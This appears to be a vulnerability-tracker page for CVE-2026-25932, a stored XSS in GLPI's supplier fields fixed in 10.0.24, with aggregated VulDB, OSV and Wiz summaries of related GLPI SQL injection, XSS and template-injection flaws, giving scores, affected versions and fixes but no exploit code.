CVE-2026-25932
published 2026-04-06CVE-2026-25932: GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier…
PriorityP421medium4.8CVSS 3.1
AVNACLPRHUIRSCCLILAN
EPSS
0.28%
19.8th percentile
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier fields. This vulnerability is fixed in 10.0.24.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| glpi-project | glpi | — | — |
| glpi-project | glpi | >= 0.60 < 10.0.24 | 10.0.24 |
CVSS provenance
nvdv3.14.8MEDIUMCVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
osv4.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
glpi-project glpi up to 10.0.23 supplier cross site scripting (GHSA-m627-945g-x7xh / Nessus ID 305610)
vuldb·2026-04-13·CVSS 7.2
CVE-2026-25932 [HIGH] glpi-project glpi up to 10.0.23 supplier cross site scripting (GHSA-m627-945g-x7xh / Nessus ID 305610)
A vulnerability has been found in glpi-project glpi up to 10.0.23 and classified as problematic. Affected by this vulnerability is an unknown functionality. Performing a manipulation of the argument supplier results in cross site scripting.
This vulnerability is known as CVE-2026-25932. Remote exploitation of the attack is possible. No exploit is available.
The affected component should be upgraded.
OSV
CVE-2026-25932: GLPI is a Free Asset and IT Management Software package
osv·2026-04-07·CVSS 4.8
CVE-2026-25932 [MEDIUM] CVE-2026-25932: GLPI is a Free Asset and IT Management Software package
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier fields. This vulnerability is fixed in 10.0.24.
No detection rules found.
No public exploits indexed.
Wiz
CVE-2026-29047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-29047 [HIGH] CVE-2026-29047 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29047 :
GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6.
Source : NVD
## 8.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
GLPI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:glpi-project:glpi
Sources
Linux Severity HIGH Has Fix Added at: Apr 09, 2026
Windows Severity HIGH Has Fix Added at: Apr 09, 2026
Linux Severity HIGH Has Fix Ad
Wiz
CVE-2026-26263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-26263 [HIGH] CVE-2026-26263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26263 :
GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6.
Source : NVD
## 9.8
Score
Published April 6, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
GLPI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:glpi-project:glpi
Sources
Linux Severity CRITICAL Has Fix Added at: Apr 09, 2026
Windows Severity CRITICAL Has Fix Added at: Apr 09, 2026
Linux Severity CRITICAL Has Fix Added a
Wiz
CVE-2026-26026 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-26026 [HIGH] CVE-2026-26026 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26026 :
GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE. This vulnerability is fixed in 11.0.6.
Source : NVD
## 7.2
Score
Published April 6, 2026
Severity HIGH
CNA Score 9.1
Affected Technologies
GLPI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:glpi-project:glpi
Sources
Linux Severity HIGH Has Fix Added at: Apr 09, 2026
Windows Severity HIGH Has Fix Added at: Apr 09, 2026
Linux Severity HIGH Has Fix Added at: Apr 10, 2026
Windows Severity HIGH Has Fix
Wiz
CVE-2026-25932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-25932 [HIGH] CVE-2026-25932 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25932 :
GLPI vulnerability analysis and mitigation
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in a supplier fields. This vulnerability is fixed in 10.0.24.
Source : NVD
## 4.8
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 7.2
Affected Technologies
GLPI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:glpi-project:glpi
Sources
Linux Severity MEDIUM Has Fix Added at: Apr 09, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 09, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 10,
Wiz
CVE-2026-26027 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-26027 [HIGH] CVE-2026-26027 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26027 :
GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated user can store an XSS payload through the inventory endpoint. This vulnerability is fixed in 11.0.6.
Source : NVD
## 6.1
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 7.5
Affected Technologies
GLPI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:glpi-project:glpi
Sources
Linux Severity MEDIUM Has Fix Added at: Apr 09, 2026
Windows Severity MEDIUM Has Fix Added at: Apr 09, 2026
Linux Severity MEDIUM Has Fix Added at: Apr 10,
2026-04-06
Published